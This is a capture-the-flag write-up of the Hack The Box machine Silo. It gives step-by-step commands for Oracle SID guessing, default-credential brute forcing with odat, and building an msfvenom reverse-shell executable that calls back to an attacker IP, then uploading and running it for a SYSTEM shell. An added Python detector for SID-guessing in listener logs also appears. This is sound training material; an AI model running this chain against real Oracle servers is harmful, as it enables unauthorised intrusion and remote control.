Hack The Box — Silo — without Metasploit (TJNull’s list for OSCP)

Daniyal Ahmed
Jun 17, 2023

This is my 29th write-up for Silo, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.

In a general penetration test or a CTF, there are usually three major phases:

  1. Enumeration and Scanning (Information Gathering).
  2. Initial Foothold.
  3. Privilege Escalation.

Let’s get started with the box!

Enumeration

First, let’s run an nmap scan on default ports to see what services are running on the target system.

nmap -sC -sV -O -Pn -oA nmap/initial silo.htb

So, we have an HTTP server running and an Oracle TNS listener on ports 1521 and 4196.

Let’s jump to the HTTP server and see what we have there.

Default page for Microsoft IIS. Let’s try directory busting and see if we get anything.

gobuster dir -u http://silo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x asp,,db,jsp,html,log,txt -t 200 -k --no-error

But it does not reveal anything.

Let’s try enumerating the Oracle TNS listener. We will be using odat (Oracle Database Attacking Tool) for that.

First, let’s enumerate the valid SIDs.

odat sidguesser -s silo.htb -p 1521

XE seems to be a valid SID for the server.
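
From the defender's side, SID guessing like this shows up in the Oracle listener log (when listener logging is enabled) as one source being refused with TNS-12505 across many different SIDs. The detector below is an added example, not part of the original write-up; the sample lines are constructed in the text listener.log layout, and the name find_sid_guessing and the threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the text listener.log layout (fields separated by " * ",
# last field is the TNS return code). Hosts, users and addresses are made up.
_L = ("17-JUN-2023 10:0{n}:00 * (CONNECT_DATA=(SID={sid})(CID=(PROGRAM=)(HOST={h})"
      "(USER={u}))) * (ADDRESS=(PROTOCOL=tcp)(HOST={ip})(PORT=4{n}112)) "
      "* establish * {sid} * {rc}")
SAMPLE_LOG = "\n".join(
    [_L.format(n=i, sid=s, h="kali", u="root", ip="10.10.16.5", rc=rc)
     for i, (s, rc) in enumerate([("ORCL", 12505), ("PROD", 12505),
                                  ("TEST", 12505), ("XE", 0)])]
    + ["TNS-12505: TNS:listener does not currently know of SID given in connect descriptor",
       _L.format(n=5, sid="XEE", h="app01", u="svc", ip="10.10.10.20", rc=12505),
       _L.format(n=6, sid="XE", h="app01", u="svc", ip="10.10.10.20", rc=0)])

# Requested SID, client address from the ADDRESS field, and the return code.
LINE_RE = re.compile(
    r"\(CONNECT_DATA=.*?\(SID=(?P<sid>[^)]*)\)"
    r".*?\(ADDRESS=.*?\(HOST=(?P<src>[^)]+)\)"
    r".*?\* establish \* .*? \* (?P<code>\d+)\s*$")

def find_sid_guessing(log_text, min_distinct_sids=3):
    """Return {source: {"rejected": [...], "accepted": [...]}} for every source
    refused with TNS-12505 (unknown SID) on at least min_distinct_sids SIDs.
    "accepted" lists SIDs the listener handed off (code 0); that is a valid
    SID, not a successful database login."""
    rejected, accepted = defaultdict(set), defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # continuation lines such as the TNS-12505 message text
        if m["code"] == "12505":
            rejected[m["src"]].add(m["sid"].upper())
        elif m["code"] == "0":
            accepted[m["src"]].add(m["sid"].upper())
    return {src: {"rejected": sorted(sids), "accepted": sorted(accepted[src])}
            for src, sids in rejected.items() if len(sids) >= min_distinct_sids}

if __name__ == "__main__":
    for src, hit in find_sid_guessing(SAMPLE_LOG).items():
        print(src, "rejected:", hit["rejected"], "accepted:", hit["accepted"])
```

A single mistyped SID from an application host stays below the threshold, while a source that was refused on several SIDs and then accepted on one is reported together with the SID it found.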

Metasploit ships a list of default Oracle usernames and passwords. Let’s locate it and copy it.

locate oracle_default_userpass.txt
cp /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt .

The usernames and passwords in this list are separated by a space instead of a forward slash (/). We’ll have to change the separator to a forward slash so that ODAT is able to parse the file. This can be done in vi using the following command.

 :%s/ /\//g

After the substitution, each line of the file has the form username/password.

Now let’s use this to brute force the credentials.

odat passwordguesser -s silo.htb -p 1521 -d XE --accounts-file /root/TJNull/Windows/Silo/oracle_default_userpass.txt

(You may have to give the full path of the oracle_default_userpass.txt file.)

And we got the credentials scott/tiger.

Initial Foothold

ODAT has a utlfile module that allows you to upload, download or delete a file. Since we are trying to get code execution on the box, let’s upload a malicious executable that sends a reverse shell back to our attack machine.

For that, we first need to generate a shell for Windows.

msfvenom -p windows/shell_reverse_tcp LHOST="10.10.16.5" LPORT=4242 -f exe > shell.exe

Now, let’s upload the file using the utlfile module.

odat utlfile -s silo.htb -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp shell.exe shell.exe 

We get an insufficient privileges error. Just add the --sysdba flag to the command.

odat utlfile -s silo.htb -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp shell.exe /root/TJNull/Windows/Silo/shell.exe --sysdba

Let’s start a listener and execute the uploaded file using the externaltable module.

odat externaltable -s silo.htb -p 1521 -U "scott" -P "tiger" -d XE --exec /temp shell.exe --sysdba

And we got a system shell! No Privilege Escalation needed.

:)
